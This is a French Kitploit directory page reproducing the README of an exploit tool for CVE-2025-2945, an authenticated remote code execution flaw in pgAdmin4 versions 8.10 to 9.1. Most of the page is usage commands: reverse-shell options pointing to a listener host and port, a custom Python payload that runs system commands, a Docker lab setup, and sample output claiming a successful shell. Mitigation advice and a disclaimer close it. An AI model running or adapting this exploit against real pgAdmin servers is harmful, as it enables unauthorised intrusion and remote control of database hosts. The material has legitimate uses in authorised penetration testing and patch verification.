Skip to content
KitploitKITPLOIT
OutilsBlog
Log in
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-2945 — Exploit pour la vulnérabilité d'exécution de code à distance (RCE) de pgAdmin4 affectant les versions 8.10 à 9.1. | Kitploit
Outils/GitHubGitHub/g0d150ne/cve-2025-2945
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubg0d150ne/cve-2025-2945

CVE-2025-2945

Exploit pour la vulnérabilité d'exécution de code à distance (RCE) de pgAdmin4 affectant les versions 8.10 à 9.1.

Voir le dépôt
20il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-2945 - Exploit RCE authentifié pgAdmin4

Auteur : G0D150NE Version : 2.0.0
CVE : CVE-2025-2945
Sévérité : Critique (CVSS 9.9)

📌 Description

Exploit pour la vulnérabilité d'exécution de code à distance (RCE) de pgAdmin4 affectant les versions 8.10 à 9.1.

La vulnérabilité se situe dans le point de terminaison /sqleditor/query_tool/download où le paramètre query_commited est passé sans assainissement à la fonction eval() de Python, permettant l'exécution de code arbitraire.

⚡ Fonctionnalités

  • ✅ Détection automatique de la version
  • ✅ Collecte du jeton CSRF depuis plusieurs sources
  • ✅ Énumération des ID serveur/groupe
  • ✅ Charge utile de reverse shell (encodée en base64)
  • ✅ Support de charge utile personnalisée
  • ✅ Mode débogage verbeux
  • ✅ Sortie console colorée
  • ✅ Contournement de la vérification SSL

🚀 Installation

# Clone or download the script
git clone https://github.com/g0d150ne/CVE-2025-2945
cd CVE-2025-2945

# Install dependencies
pip install requests

🎯 Utilisation

Utilisation de base

python3 poc.py \
  --target-url http://target:5050 \
  --username [email protected] \
  --password admin123 \
  --db-user postgres \
  --db-pass postgres \
  --db-name postgres \
  --Rhost 10.10.14.7 \
  --Rport 4444

Avec sortie verbeuse

python3 poc.py \
  --target-url http://target:5050 \
  --username [email protected] \
  --password admin123 \
  --db-user postgres \
  --db-pass postgres \
  --db-name postgres \
  --Rhost 10.10.14.7 \
  --Rport 4444 \
  -v

Charge utile personnalisée

python3 poc.py \
  --target-url http://target:5050 \
  --username [email protected] \
  --password admin123 \
  --db-user postgres \
  --db-pass postgres \
  --db-name postgres \
  --Rhost 10.10.14.7 \
  --Rport 4444 \
  --custom-payload "__import__('os').system('whoami > /tmp/test.txt')"

Ignorer la vérification de version

python3 poc.py \
  --target-url http://target:5050 \
  --username [email protected] \
  --password admin123 \
  --db-user postgres \
  --db-pass postgres \
  --db-name postgres \
  --Rhost 10.10.14.7 \
  --Rport 4444 \
  --skip-version-check

📊 Arguments

Argument Requis Description --target-url Oui URL de base de pgAdmin4 (http://RHOST:PORT/) --username Oui Email de connexion pgAdmin4 --password Oui Mot de passe de connexion pgAdmin4 --db-user Oui Nom d'utilisateur de la base de données --db-pass Oui Mot de passe de la base de données --db-name Oui Nom de la base de données --Rhost Oui IP d'écoute pour le reverse shell --Rport Oui Port d'écoute pour le reverse shell --max-server-id Non ID serveur maximal à analyser (défaut : 10) --skip-version-check Non Ignorer la vérification de version --custom-payload Non Charge utile Python personnalisée --verbose, -v Non Activer la sortie de débogage --no-banner Non Masquer la bannière

📋 Prérequis

· Python 3.6+ · Bibliothèque requests

pip install requests

🧪 Environnement de test

# Docker pgAdmin vulnerable version
docker run -d -p 5050:5050 \
  -e [email protected] \
  -e PGADMIN_DEFAULT_PASSWORD=admin123 \
  dpage/pgadmin4:8.10

# Then run the exploit
python3 poc.py \
  --target-url http://localhost:5050 \
  --username [email protected] \
  --password admin123 \
  --db-user postgres \
  --db-pass postgres \
  --db-name postgres \
  --Rhost 10.10.14.7 \
  --Rport 4444

🖥️ Exemple de sortie

   ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄ 
  ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌
  ▐░█▀▀▀▀▀▀▀▀▀ ▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀▀▀ ▐░█▀▀▀▀▀▀▀▀▀ 
  ▐░▌          ▐░▌       ▐░▌▐░▌       ▐░▌▐░▌          ▐░▌          
  ▐░█▄▄▄▄▄▄▄▄▄ ▐░█▄▄▄▄▄▄▄█░▌▐░▌       ▐░▌▐░█▄▄▄▄▄▄▄▄▄ ▐░▌          
  ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░▌       ▐░▌▐░░░░░░░░░░░▌▐░▌          
   ▀▀▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀█░▌▐░▌       ▐░▌ ▀▀▀▀▀▀▀▀▀█░▌▐░▌          
            ▐░▌▐░▌       ▐░▌▐░▌       ▐░▌          ▐░▌▐░▌          
   ▄▄▄▄▄▄▄▄▄█░▌▐░▌       ▐░▌▐░█▄▄▄▄▄▄▄█░▌ ▄▄▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄▄▄ 
  ▐░░░░░░░░░░░▌▐░▌       ▐░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌
   ▀▀▀▀▀▀▀▀▀▀▀  ▀         ▀  ▀▀▀▀▀▀▀▀▀▀▀  ▀▀▀▀▀▀▀▀▀▀▀  ▀▀▀▀▀▀▀▀▀▀▀ 
   
   CVE-2025-2945 - pgAdmin4 Authenticated RCE
   Author: G0D150NE
   Version: 2.0.0

[*] Target running vulnerable version 8.10
[*] Authenticating as [email protected]...
[+] Authentication successful
[*] Scanning for valid server (SGID: 7, max: 10)...
[+] Found valid server (SGID: 7, SID: 1)
[*] Initializing SQL editor (trans_id: 4827193)...
[+] SQL editor initialized
[*] Reverse shell payload to 10.10.14.7:4444
[*] Sending payload...
[+] Payload delivered (HTTP 500)
[*] Check listener at your endpoint
[+] Exploit successful!
[*] Check reverse shell on 10.10.14.7:4444

🛡️ Atténuation

· Mettez à niveau pgAdmin4 vers la version 9.2 ou supérieure · Restreignez l'accès à l'interface pgAdmin · Utilisez des identifiants robustes · Activez la MFA si disponible

⚠️ Avertissement

Cet outil est destiné uniquement aux tests de sécurité autorisés et à des fins éducatives. L'utilisation de cet outil contre des systèmes sans autorisation explicite est illégale. L'auteur décline toute responsabilité en cas d'usage abusif.

🔗 Références

· CVE-2025-2945 · Avis de sécurité pgAdmin

📄 Licence

Licence MIT

Télécharger l’outil